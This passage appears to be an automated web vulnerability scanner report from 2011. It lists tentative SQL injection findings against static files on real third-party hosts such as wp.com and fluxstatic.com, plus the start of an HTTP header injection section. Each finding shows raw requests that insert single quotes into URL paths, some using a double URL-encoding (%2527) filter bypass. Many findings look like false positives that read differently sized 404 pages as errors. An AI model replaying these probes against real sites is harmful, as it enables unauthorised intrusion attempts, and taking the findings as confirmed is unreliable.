GET /b%2527/ss/djglobal,djwsj/1/H.20.3/s22808814137242?AQB=1&ndh=1&t=13/5/2011%2019%3A14%3A10%201%20300&vmt=44BD02B1&ns=dowjones&pageName=WSJ_Technology_SB10001424052702304665904576383880754844512&g=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&r=http%3A//online.wsj.com/public/page/news-tech-technology.html%3Frefresh%3Don&cc=USD&ch=Online%20Journal&server=online.wsj.com&v0=WSJ_Tech_LEADTop&events=event12%2Cevent18&c1=Article&c2=WSJ_Tech&c3=WSJ_Article_Technology&c4=WSJ_article_Technology_Banner%20Ads%20and%20Other%20%27Local%27%20Flops&v4=WSJ_Technology_SB10001424052702304665904576383880754844512&c5=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html&v5=WSJ_Tech_LEADTop&c6=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&c7=off&c8=WSJ%20Online%20Article&c9=preview&c10=WSJ_Tech_LEADTop&v11=Online%20Journal&c13=tech_main_story&c19=article_preview&c20=SB10001424052702304665904576383880754844512&c21=WSJ_Stu%20Woo%2C%20Geoffrey%20A.%20Fowler&c22=WSJ_Article_Tech&c24=Edition_North_America_USA&v25=WSJ_Tech&c26=WSJ_Tech&c27=WSJ_free&v29=WSJ_Tech&v31=Monday&v32=19%3A00&v37=WSJ_Article_Technology&c49=1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=WSJ_Tech_0_0_WP_2200&pidt=1&oid=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&ot=A&AQE=1 HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72A64051D1F1F-4000010980086687[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Jun 2011 00:26:36 GMT
Server: Omniture DC/2.0.0
Content-Length: 442
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/djglobal,djwsj/1/H.20.3/s22808814137242 was
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/djglobal,djwsj/1/H.20.3/s22808814137242?AQB=1&ndh=1&t=13/5/2011%2019%3A14%3A10%201%20300&vmt=44BD02B1&ns=dowjones&pageName=WSJ_Technology_SB10001424052702304665904576383880754844512&g=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&r=http%3A//online.wsj.com/public/page/news-tech-technology.html%3Frefresh%3Don&cc=USD&ch=Online%20Journal&server=online.wsj.com&v0=WSJ_Tech_LEADTop&events=event12%2Cevent18&c1=Article&c2=WSJ_Tech&c3=WSJ_Article_Technology&c4=WSJ_article_Technology_Banner%20Ads%20and%20Other%20%27Local%27%20Flops&v4=WSJ_Technology_SB10001424052702304665904576383880754844512&c5=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html&v5=WSJ_Tech_LEADTop&c6=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&c7=off&c8=WSJ%20Online%20Article&c9=preview&c10=WSJ_Tech_LEADTop&v11=Online%20Journal&c13=tech_main_story&c19=article_preview&c20=SB10001424052702304665904576383880754844512&c21=WSJ_Stu%20Woo%2C%20Geoffrey%20A.%20Fowler&c22=WSJ_Article_Tech&c24=Edition_North_America_USA&v25=WSJ_Tech&c26=WSJ_Tech&c27=WSJ_free&v29=WSJ_Tech&v31=Monday&v32=19%3A00&v37=WSJ_Article_Technology&c49=1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=WSJ_Tech_0_0_WP_2200&pidt=1&oid=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&ot=A&AQE=1 HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72A64051D1F1F-4000010980086687[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Jun 2011 00:26:36 GMT
Server: Omniture DC/2.0.0
xserver: www438
Content-Length: 0
Content-Type: text/html


1.5. http://s0.wp.com/wp-content/themes/h4/i/ajax-loader.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://s0.wp.com
Path:   /wp-content/themes/h4/i/ajax-loader.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /wp-content/themes/h4/i'/ajax-loader.gif?m=1274328069g HTTP/1.1
Host: s0.wp.com
Proxy-Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 14 Jun 2011 00:32:17 GMT
Server: nginx
Content-Length: 564

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
...[SNIP]...

Request 2

GET /wp-content/themes/h4/i''/ajax-loader.gif?m=1274328069g HTTP/1.1
Host: s0.wp.com
Proxy-Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 14 Jun 2011 00:32:18 GMT
Server: nginx
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

1.6. http://s0.wp.com/wp-content/themes/h4/i/header-bg.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://s0.wp.com
Path:   /wp-content/themes/h4/i/header-bg.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /wp-content/themes'/h4/i/header-bg.png?2 HTTP/1.1
Host: s0.wp.com
Proxy-Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 14 Jun 2011 00:31:56 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 564

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
...[SNIP]...

Request 2

GET /wp-content/themes''/h4/i/header-bg.png?2 HTTP/1.1
Host: s0.wp.com
Proxy-Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 14 Jun 2011 00:31:57 GMT
Server: nginx
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

1.7. http://s1.wp.com/wp-includes/js/swfobject.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://s1.wp.com
Path:   /wp-includes/js/swfobject.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /wp-includes/js%2527/swfobject.js?m=1306159264g&ver=2.2 HTTP/1.1
Host: s1.wp.com
Proxy-Connection: keep-alive
Referer: http://videopress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 14 Jun 2011 00:32:31 GMT
Server: nginx
Content-Length: 564

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
...[SNIP]...

Request 2

GET /wp-includes/js%2527%2527/swfobject.js?m=1306159264g&ver=2.2 HTTP/1.1
Host: s1.wp.com
Proxy-Connection: keep-alive
Referer: http://videopress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 14 Jun 2011 00:32:32 GMT
Server: nginx
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

1.8. http://static0.fluxstatic.com/-/Clients/Common/JS/Controls/ButtonControl.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static0.fluxstatic.com
Path:   /-/Clients/Common/JS/Controls/ButtonControl.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /-'/Clients/Common/JS/Controls/ButtonControl.js?7622b7ab HTTP/1.1
Host: static0.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s01s
Cache-Control: max-age=2600000
Date: Tue, 14 Jun 2011 00:28:14 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /-''/Clients/Common/JS/Controls/ButtonControl.js?7622b7ab HTTP/1.1
Host: static0.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2599976
Date: Tue, 14 Jun 2011 00:28:15 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found

1.9. http://static1.fluxstatic.com/-/Clients/Common/JS/Controls/OverlayPanel.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static1.fluxstatic.com
Path:   /-/Clients/Common/JS/Controls/OverlayPanel.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /-/Clients/Common/JS/Controls'/OverlayPanel.js?7636d0b0 HTTP/1.1
Host: static1.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s01s
Cache-Control: max-age=2600000
Date: Tue, 14 Jun 2011 00:28:07 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /-/Clients/Common/JS/Controls''/OverlayPanel.js?7636d0b0 HTTP/1.1
Host: static1.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2600000
Date: Tue, 14 Jun 2011 00:28:07 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found

1.10. http://static2.fluxstatic.com/-/Clients/Common/JS/Common/AjaxBaseControl.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static2.fluxstatic.com
Path:   /-/Clients/Common/JS/Common/AjaxBaseControl.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /-/Clients'/Common/JS/Common/AjaxBaseControl.js?772b0733 HTTP/1.1
Host: static2.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s01s
Cache-Control: max-age=2599954
Date: Tue, 14 Jun 2011 00:28:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /-/Clients''/Common/JS/Common/AjaxBaseControl.js?772b0733 HTTP/1.1
Host: static2.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2599997
Date: Tue, 14 Jun 2011 00:28:31 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found

1.11. http://static3.fluxstatic.com/-/Clients/Common/JS/Common/AjaxBasePage.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static3.fluxstatic.com
Path:   /-/Clients/Common/JS/Common/AjaxBasePage.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /-'/Clients/Common/JS/Common/AjaxBasePage.js?772999d2 HTTP/1.1
Host: static3.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s01s
Cache-Control: max-age=2599991
Date: Tue, 14 Jun 2011 00:28:26 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /-''/Clients/Common/JS/Common/AjaxBasePage.js?772999d2 HTTP/1.1
Host: static3.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2599975
Date: Tue, 14 Jun 2011 00:28:27 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found

1.12. http://static3.fluxstatic.com/-/Clients/Common/JS/Controls/PrefilledTextBox.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static3.fluxstatic.com
Path:   /-/Clients/Common/JS/Controls/PrefilledTextBox.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /-/Clients/Common%2527/JS/Controls/PrefilledTextBox.js?761f2727 HTTP/1.1
Host: static3.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s01s
Cache-Control: max-age=2599975
Date: Tue, 14 Jun 2011 00:28:24 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /-/Clients/Common%2527%2527/JS/Controls/PrefilledTextBox.js?761f2727 HTTP/1.1
Host: static3.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2600000
Date: Tue, 14 Jun 2011 00:28:24 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found

1.13. http://static3.fluxstatic.com/-/Clients/Common/JS/Controls/PrefilledTextBox.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static3.fluxstatic.com
Path:   /-/Clients/Common/JS/Controls/PrefilledTextBox.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /-/Clients/Common/JS/Controls'/PrefilledTextBox.js?761f2727 HTTP/1.1
Host: static3.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s01s
Cache-Control: max-age=2599971
Date: Tue, 14 Jun 2011 00:28:28 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /-/Clients/Common/JS/Controls''/PrefilledTextBox.js?761f2727 HTTP/1.1
Host: static3.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2599970
Date: Tue, 14 Jun 2011 00:28:28 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found

2. HTTP header injection  previous  next
There are 15 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://ad.doubleclick.net/activity [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

